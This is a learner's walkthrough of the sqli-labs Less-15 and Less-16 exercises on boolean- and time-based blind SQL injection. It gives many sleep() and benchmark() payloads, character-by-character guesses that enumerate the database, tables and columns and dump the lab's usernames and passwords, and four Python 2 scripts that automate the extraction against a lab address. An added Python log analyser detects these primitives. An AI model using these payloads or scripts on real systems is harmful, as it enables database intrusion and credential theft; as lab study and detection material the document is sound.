I went through sqli-labs once before; this is a second pass to consolidate it, with all of the code typed out by hand so that it sticks.
Boolean-based / time-based blind injection
Function walkthrough
Boolean-based blind injection
Four approaches:
- left()
- ascii(), substr()
- regexp
- ord(), mid()
Where:
- left(string,2)='sa': the first two characters of string are "sa"
- ascii(substr(string,2,1))=102: the ASCII code of the single character at position 2 of string is 102
- table_name regexp '^us[a-z]': table_name starts with "us"
- ord(mid(string,2,1))=68: the character code of the single character at position 2 of string is 68
Examples
left()
admin' and left((query to inject),1)='xxx'#
admin' and left((select database() limit 0,1),1)='s'#
ascii(substr())=xxx // character code
admin' and ascii(substr((query to inject),1,1))=102#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101#
xxxx regexp '^us[a-z]'
admin' and ((query to inject) regexp '^se' limit 0,1)#
admin' and (select database() regexp '^se' limit 0,1)#
ord(mid())=xxx // character code
admin' and ord(mid((select username from security.users limit 0,1),1,1))=68#
admin' and ord(mid((select password from security.users limit 0,1),1,1))=68#
ifnull(expr1,expr2): returns the first argument if it is not NULL, otherwise the second. cast(column as type): converts the column to the given type.
admin' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68#
admin' and ord(mid((select ifnull(cast(password as char),0x20) from security.users order by id limit 0,1),1,1))=68#
Time-based blind injection
Injection using the sleep() function
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)#
?id=1' union select (if(substring(database(),1,1)=char(115),sleep(5),1)),2,3#
?id=1' and if(ascii(substr((query to execute),1,1))=115,sleep(5),1)#
?id=1' union select (if(substring((query to execute),1,1)=char(115),sleep(5),1)),2,3#
When the condition is true, the response is delayed by 5 seconds.
Delay injection using benchmark()
?id=1' and (select 1 from (select concat((ascii(substr((query to execute),1,1))=115),benchmark(50000000,encode('msg','key')))x from information_schema.tables group by x)a)#
?id=1' and if(ascii(substr((query to execute),1,1))=115,benchmark(50000000,encode('msg','key')),1)#
?id=1' union select (if(substring((query to execute),1,1)=char(115),benchmark(50000000,encode('msg','key')),1)),2,3#
?id=1' and (select 1 from (select concat((ascii(substr((database()),1,1))=115),benchmark(50000000,encode('msg','key')))x from information_schema.tables group by x)a)#
?id=1' and (select 1 from (select concat((select username from security.users limit 0,1),benchmark(50000000,encode('msg','key')))x from information_schema.tables group by x)a)#
?id=1' and if(ascii(substr(benchmark(50000000,encode('msg','key')),1,1))=115,sleep(5),1)#
?id=1' union select (if(substring((select database() limit 0,1),1,1)=char(115),benchmark(50000000,encode('msg','key')),1)),2,3#
When the result is true, encode('msg','key') is evaluated 50000000 times, which takes a noticeable amount of time.
benchmark() is used to measure how fast a particular operation executes. It simply returns the time the server takes to evaluate the expression, without the overhead of parsing and optimisation.
MySQL string-slicing functions: left(), right(), substring(), substring_index(), mid(), substr(). mid() and substr() are equivalent to substring().
encode() performs an encryption operation on a string; encode() and decode() are MySQL's encryption/decryption pair.
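The payloads above are exactly what a defender sees in the request log. As an added example (not part of the original post), the Python below decodes POST bodies from constructed log lines, tags the blind-injection primitives covered in this section (sleep(), benchmark(), ascii(substr()), left()/regexp '^', information_schema) and uses the recorded latency to tell which time-based probes actually received a "yes" from the server. The log format, client addresses and sample lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the blind-injection primitives walked through above. They are loose
# about whitespace and quoting so that the single-quote (Less-15) and the
# double-quote-plus-parenthesis (Less-16) variants both match after URL decoding.
SIGNATURES = {
    "time:sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "time:benchmark": re.compile(r"\bbenchmark\s*\(\s*\d{6,}\s*,", re.I),
    "bool:char-probe": re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(", re.I),
    "bool:prefix-probe": re.compile(r"\bleft\s*\(|regexp\s*['\"]\^", re.I),
    "enum:schema": re.compile(r"information_schema\.(?:tables|columns)", re.I),
}

# Hypothetical log format, constructed for this example (not from the page):
# <timestamp> <client> <method> <path> <status> <latency_ms> <url-encoded POST body>
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+) (\S*)$")

# Constructed sample lines: a normal login, then probes shaped like the payloads above.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 10.0.0.5 POST /sqli-labs/Less-16/ 200 31 uname=admin&passwd=secret&submit=Submit",
    "2024-01-01T10:00:01Z 10.0.0.9 POST /sqli-labs/Less-16/ 200 5042 uname=admin%22%29+and+if%28ascii%28substr%28%28select+database%28%29+limit+0%2C1%29%2C1%2C1%29%29%3D115%2Csleep%285%29%2C1%29%23&passwd=aaa&submit=Submit",
    "2024-01-01T10:00:07Z 10.0.0.9 POST /sqli-labs/Less-16/ 200 28 uname=admin%22%29+and+if%28ascii%28substr%28%28select+database%28%29+limit+0%2C1%29%2C1%2C1%29%29%3D116%2Csleep%285%29%2C1%29%23&passwd=aaa&submit=Submit",
    "2024-01-01T10:00:08Z 10.0.0.9 POST /sqli-labs/Less-15/ 200 30 uname=admin%27+and+%28select+1+from+information_schema.columns+where+table_name%3D%27users%27+and+column_name+regexp+%27%5Eu%27+limit+0%2C1%29%23&passwd=aaa&submit=Submit",
]

def analyse_line(line, slow_ms=4000):
    """Return (client, tags) for one log line; tags is [] when nothing matched.
    A time-based probe whose latency reaches slow_ms also gets 'oracle:true': the
    delay is the server answering the injected yes/no question with 'yes'."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    _ts, client, _method, _path, _status, latency, body = m.groups()
    decoded = unquote_plus(body)
    tags = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if int(latency) >= slow_ms and any(t.startswith("time:") for t in tags):
        tags.append("oracle:true")
    return client, tags

def summarise(lines, slow_ms=4000):
    """Count flagged requests per client: character-by-character extraction shows up
    as a burst of near-identical probes from one source rather than one bad request."""
    counts = {}
    for line in lines:
        client, tags = analyse_line(line, slow_ms)
        if tags:
            counts[client] = counts.get(client, 0) + 1
    return counts
```

On the sample lines only the second probe is tagged oracle:true, and all three probes come from one client, which is the shape to alert on.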
Less-15 Boolean/time-based blind injection, single quote
Test
Username: 1'or 1=1#, password: anything
admin' order by 2 // login succeeds
admin' order by 3 // login fails
Boolean-based injection is used. There is no error message and no keyword a script could match on, so the injection has to be done by hand.
Guessing the database name
admin' and left((query to inject),1)='xxx'#
admin' and left((select database() limit 0,1),1)='s'#
admin' and left((select database() limit 0,1),2)='se'#
admin' and left((select database() limit 0,1),3)='sec'#
admin' and left((select database() limit 0,1),8)='security'#
Result: security
Guessing the table names
admin' and ascii(substr((query to inject),1,1))=102#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),3,1))=97#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101#
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),3,1))=102#
Result: emails referers uagents users
Guessing the column names
admin' and ((query to inject) regexp '^se' limit 0,1)#
admin' and (select database() regexp '^se' limit 0,1)#
admin' and (select 1 from information_schema.columns where table_name='users' and column_name regexp '^u' limit 0,1)#
admin' and (select 1 from information_schema.columns where table_name='users' and column_name regexp '^us' limit 0,1)#
admin' and (select 1 from information_schema.columns where table_name='users' and column_name regexp '^use' limit 0,1)#
admin' and (select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)#
Result: id last password username
Guessing the data
ifnull(expr1,expr2): returns the first argument if it is not NULL, otherwise the second. cast(column as type): converts the column to the given type.
admin' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68#
admin' and ord(mid((select ifnull(cast(password as char),0x20) from security.users order by id limit 0,1),1,1))=68#
admin' and ord(mid((select username from security.users limit 0,1),1,1))=68#
admin' and ord(mid((select password from security.users limit 0,1),1,1))=68#
Result:
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin
password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
Less-16 Boolean/time-based blind injection, double quotes
Test
Username: admin') or 1=1#, password: anything
admin") order by 2# // login succeeds
admin") order by 3# // login fails
Time-based injection is used here, so a script can do the work.
Guessing the database name
admin") and if(ascii(substr((select database() limit 0,1),1,1))=115,sleep(5),1)#
admin") and if(ascii(substr((select database() limit 0,1),2,1))=101,sleep(5),1)#
admin") and if(ascii(substr((select database() limit 0,1),3,1))=99,sleep(5),1)#
Result: security
Run the script
# -*- coding: utf-8 -*-
# filename: Less16-1 database_name.py
import hackhttp
import time

def database_name(arg):
    print "database_name start test..."
    database_name = ""
    for k in range(5):                  # up to 5 databases
        for i in range(1, 10):          # character positions 1..9
            for j in range(65, 123):    # candidate codes 'A'..'z' (122 inclusive)
                startTime = time.time()
                hh = hackhttp.hackhttp()
                post = 'uname=admin")and if(ascii(substr((select database() limit {k},1),{i},1))={j},sleep(5),1) #&passwd=aaa&submit=Submit'.format(k=k, i=i, j=j)
                code, head, body, redirect_url, log = hh.http(arg, post)
                if time.time() - startTime > 5:     # sleep(5) fired: the guess was right
                    database_name += chr(j)
                    print "第%s个数据库的第%s位的ASCII码值是%s" % (k+1, i, j)
                    break
            else:
                break   # no candidate matched: end of this name
        database_name += " "
    print "security 数据库名为: {database_name}".format(database_name=database_name)

if __name__ == '__main__':
    database_name('http://10.10.10.130/sqli-labs/Less-16/')
Guessing the table names
admin") and if(ascii(substr((query to execute),1,1))=xxx,sleep(5),1)#
admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))=114,sleep(5),1)#
admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 1,1),2,1))=101,sleep(5),1)#
admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),3,1))=102,sleep(5),1)#
Result: emails referers uagents users
Run the script
# -*- coding: utf-8 -*-
# filename: Less16-2 table_name.py
import hackhttp
import time

def table_name(arg):
    print "table_name start test..."
    table_name = ""
    for k in range(5):                  # up to 5 tables
        for i in range(1, 10):          # character positions 1..9
            for j in range(65, 123):    # candidate codes 'A'..'z' (122 inclusive)
                startTime = time.time()
                hh = hackhttp.hackhttp()
                post = 'uname=admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit {k},1),{i},1))={j},sleep(5),1)#&passwd=aaa&submit=Submit'.format(k=k, i=i, j=j)
                code, head, body, redirect_url, log = hh.http(arg, post)
                if time.time() - startTime > 5:     # sleep(5) fired: the guess was right
                    table_name += chr(j)
                    print "第%s个表的第%s位的ASCII码值是%s" % (k+1, i, j)
                    break
            else:
                break   # no candidate matched: end of this name
        table_name += " "
    print "security 数据库的表名为: {table_name}".format(table_name=table_name)

if __name__ == '__main__':
    table_name('http://10.10.10.130/sqli-labs/Less-16/')
Guessing the column names
admin") and if(ascii(substr((query to execute),1,1))=115,benchmark(50000000,encode('msg','key')),1)#
admin") union select (if(substring((query to execute),1,1)=char(115),benchmark(50000000,encode('msg','key')),1)),2#
admin") union select (if(substring((select column_name from information_schema.columns where table_name="users" limit 0,1),1,1)=char(117),benchmark(50000000,encode("msg","key")),null)),2#
admin") union select (if(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)=char(115),benchmark(50000000,encode('msg','key')),null)),2#
admin") union select (if(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),3,1)=char(101),benchmark(50000000,encode('msg','key')),null)),2#
Result: user_id first_nam last_name user password
Run the script
# -*- coding: utf-8 -*-
# Running this script is too heavy on the server: it never finishes, the server
# stops responding and drops the connection (the server goes down).
# filename: Less16-3 column_name.py
import hackhttp
import time

def column_name(arg):
    print "column_name start test..."
    column_name = ""
    for k in range(5):                  # up to 5 columns
        for i in range(1, 10):          # character positions 1..9
            for j in range(65, 123):    # candidate codes 'A'..'z' (122 inclusive)
                startTime = time.time()
                hh = hackhttp.hackhttp()
                post = 'uname=admin") union select (if(substring((select column_name from information_schema.columns where table_name="users" limit {k},1),{i},1)=char({j}),benchmark(50000000,encode("msg","key")),null)),2#&passwd=aaa&submit=Submit'.format(k=k, i=i, j=j)
                code, head, body, redirect_url, log = hh.http(arg, post)
                if time.time() - startTime > 5:     # benchmark() ran: the guess was right
                    column_name += chr(j)
                    print "第%s个列的第%s位的ASCII码值是%s" % (k+1, i, j)
                    break
            else:
                break   # no candidate matched: end of this name
        column_name += " "
    print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)

if __name__ == '__main__':
    column_name('http://10.10.10.130/sqli-labs/Less-16/')
Guessing the data
admin") and if(ascii(substr((query to execute),1,1))=115,benchmark(50000000,encode('msg','key')),1)#
admin") and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,benchmark(50000000,encode('msg','key')),1)#
admin") and if(ascii(substr((select username from security.users limit 0,1),2,1))=117,benchmark(50000000,encode('msg','key')),1)#
admin") and if(ascii(substr((select username from security.users limit 0,1),3,1))=109,benchmark(50000000,encode('msg','key')),1)#
Result:
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin
password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
Run the script
# -*- coding: utf-8 -*-
# Running this script is too heavy on the server: it never finishes, the server
# stops responding and drops the connection (the server goes down).
# filename: Less16-4 data.py
import hackhttp
import time

def data(arg):
    print "data start test..."
    payload2 = ['username', 'password']
    data = "username: "
    for k in payload2:                      # the two column names
        for x in range(10):                 # assume ten rows per column
            for i in range(1, 10):          # character i of each value is compared against j
                for j in range(65, 123):    # candidate codes 'A'..'z' (122 inclusive)
                    startTime = time.time()
                    hh = hackhttp.hackhttp()
                    post = 'uname=admin") and if(ascii(substr((select {k} from security.users limit {x},1),{i},1))={j},benchmark(50000000,encode("msg","key")),1)#&passwd=aaa&submit=Submit'.format(k=k, x=x, i=i, j=j)
                    code, head, body, redirect_url, log = hh.http(arg, post)
                    if time.time() - startTime > 5:     # benchmark() ran: the guess was right
                        data += chr(j)
                        print "%s列的第%s个数据的第%s位的ASCII码值是%s" % (k, x+1, i, j)
                        break
                else:
                    break   # no candidate matched: end of this value
            data += "\t"
        print "{data}".format(data=data)
        data += "\npassword: "

if __name__ == '__main__':
    data('http://10.10.10.130/sqli-labs/Less-16/')